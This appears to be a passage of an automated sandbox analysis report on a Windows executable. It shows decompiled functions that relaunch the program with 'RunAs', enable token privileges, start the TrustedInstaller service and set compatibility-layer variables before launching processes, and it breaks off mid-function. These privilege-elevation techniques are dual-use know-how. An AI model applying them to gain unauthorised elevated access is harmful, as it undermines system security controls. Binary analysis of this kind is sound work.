API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

0x00401c31
0x00401c33
0x00401c48
0x00401c4f
0x00401c61
0x00401c68
0x00401c74
0x00401c79
0x00401c7a
0x00401c7b
0x00401c84
0x00401c89
0x00401c8e
0x00401c8f
0x00401c9b
0x00401ca6
0x00401caf
0x00401cb9
0x00401cc0
0x00401cc7
0x00401cce
0x00401cd5
0x00401cdd
0x00401ce0
0x00401d14
0x00401ce2
0x00401ce8
0x00401cf3
0x00401cf6
0x00401cfe
0x00401d09
0x00401d09
0x00401cfe
0x00401d1b

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNELBASE ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

/SpecialRun %I64x %d, xrefs: 00401C84
@, xrefs: 00401CC7
RunAs, xrefs: 00401CC0
<, xrefs: 00401CB9

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

0x00408fc9
0x00408fd0
0x00408fe8
0x00000000
0x00408fea
0x00408ff4
0x00409001
0x00409003
0x0040900c
0x0040900e
0x00409010
0x0040901a
0x0040901a
0x00409010
0x0040901f
0x00409026
0x0040902d
0x00409030
0x00409035
0x00409037
0x00409040
0x00409042
0x00409044
0x00409051
0x00409051
0x00409044
0x00409053
0x0040905e
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

AdjustTokenPrivileges, xrefs: 00409039
LookupPrivilegeValueW, xrefs: 00409005

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}

0x0040a348
0x0040a34e
0x0040a352
0x0040a35f
0x0040a363
0x0040a369
0x0040a371
0x0040a374
0x0040a37c
0x0040a380
0x0040a383
0x0040a386
0x0040a388
0x0040a388
0x0040a38c
0x0040a38f
0x0040a39f
0x0040a3a1
0x0040a3a5
0x0040a3a5
0x0040a3a9
0x0040a3aa
0x0040a3b3
0x0040a3b3
0x0040a37c
0x0040a371
0x0040a3b8
0x0040a3be

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
SizeofResource.KERNEL32(?,00000000), ref: 0040A359
LoadResource.KERNEL32(?,00000000), ref: 0040A369
LockResource.KERNEL32(00000000), ref: 0040A374

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

0x004022d5
0x004022dd
0x004022e7
0x004022ec
0x004022f7
0x004022fa
0x004022fd
0x00402300
0x00402307
0x0040230d
0x0040230e
0x00402318
0x00402321
0x00402324
0x00402327
0x0040232a
0x0040232d
0x00402334
0x00402337
0x0040233e
0x0040234f
0x00402356
0x0040235b
0x0040235e
0x0040236d
0x00402374
0x0040237e
0x00402395
0x004023a0
0x004023a0
0x004023ac
0x004023cf
0x004023d2
0x004023d9
0x004023de
0x004023f6
0x00402403
0x00402414
0x00402419
0x00402403
0x0040241a
0x00402423
0x00402458
0x0040245d
0x00402464
0x00402467
0x00402468
0x00000000
0x00000000
0x00000000
0x00402425
0x00402428
0x0040242b
0x00402433
0x00402434
0x00402473
0x00402473
0x0040247c
0x00402481
0x00402488
0x00402488
0x00402495
0x0040249a
0x004024b7
0x004024be
0x004024cd
0x004024d1
0x004024ed
0x004024f0
0x00402506
0x0040250b
0x00402512
0x00402518
0x00402519
0x0040251e
0x00402524
0x00402527
0x0040252b
0x00402530
0x00402531
0x00402531
0x0040253d
0x0040255a
0x00402561
0x00402570
0x00402574
0x00402590
0x00402593
0x004025a9
0x004025ae
0x004025b5
0x004025bb
0x004025bc
0x004025c1
0x004025c7
0x004025ca
0x004025cd
0x004025ce
0x004025d4
0x004025d4
0x004025da
0x004025e3
0x004025eb
0x00402633
0x004025fb
0x00402608
0x0040260f
0x00402614
0x00402624
0x00402630
0x00402630
0x0040263a
0x0040263b
0x00402646
0x0040264b
0x0040264c
0x0040265a
0x0040265a
0x0040265d
0x00402666
0x00402668
0x00402668
0x00402672
0x00402675
0x0040267e
0x0040267e
0x00402683
0x0040268b
0x0040269e
0x0040269e
0x004026a3
0x004026ac
0x004026b5
0x004026b8
0x00000000
0x00000000
0x004026ba
0x00000000
0x004026ae
0x004026ae
0x004026bf
0x004026c1
0x004026c6
0x004026cc
0x004026d5
0x004026db
0x004026e4
0x004026ea
0x004026f3
0x004026f9
0x00402707
0x00402707
0x0040270d
0x00402710
0x0040276d
0x00402770
0x0040280b
0x0040280e
0x00402813
0x00402810
0x00402810
0x00402810
0x00402819
0x0040281f
0x00402836
0x00402841
0x00402846
0x0040284a
0x00402851
0x00402857
0x00402860
0x00402865
0x00402876
0x00402879
0x00402888
0x00402888
0x00402857
0x00402891
0x0040289c
0x0040289c
0x00402779
0x00402784
0x0040278d
0x004027a4
0x004027b3
0x004027b8
0x004027bb
0x004027bf
0x004027c6
0x004027c6
0x004027d1
0x004027d6
0x004027d9
0x004027db
0x004027e2
0x004027e4
0x004027e4
0x004027e7
0x004027f4
0x004027fc
0x00402801
0x00402801
0x00402803
0x00402803
0x00402806
0x00000000
0x00402806
0x00402715
0x00402729
0x0040272e
0x00402731
0x00402738
0x00402738
0x00402743
0x00402748
0x0040274d
0x00402754
0x00402756
0x00402756
0x00402759
0x00402763
0x00000000
0x00402763
0x004026fb
0x00402700
0x00402702
0x00000000
0x00402702
0x004026ec
0x00000000
0x004026ec
0x004026dd
0x00000000
0x004026dd
0x004026ce
0x00000000
0x004026ce
0x004026ac
0x00402443
0x0040246a
0x00402470
0x00000000
0x00402470

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

640X480, xrefs: 004026CE
DISABLEDWM, xrefs: 004026EC
D, xrefs: 00402374
"%s" %s, xrefs: 0040263B
256COLOR, xrefs: 004026AE
DISABLETHEMES, xrefs: 004026DD
HIGHDPIAWARE, xrefs: 004026FB
16BITCOLOR, xrefs: 004026BA
RunAsInvoker, xrefs: 00402677
__COMPAT_LAYER, xrefs: 00402814

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
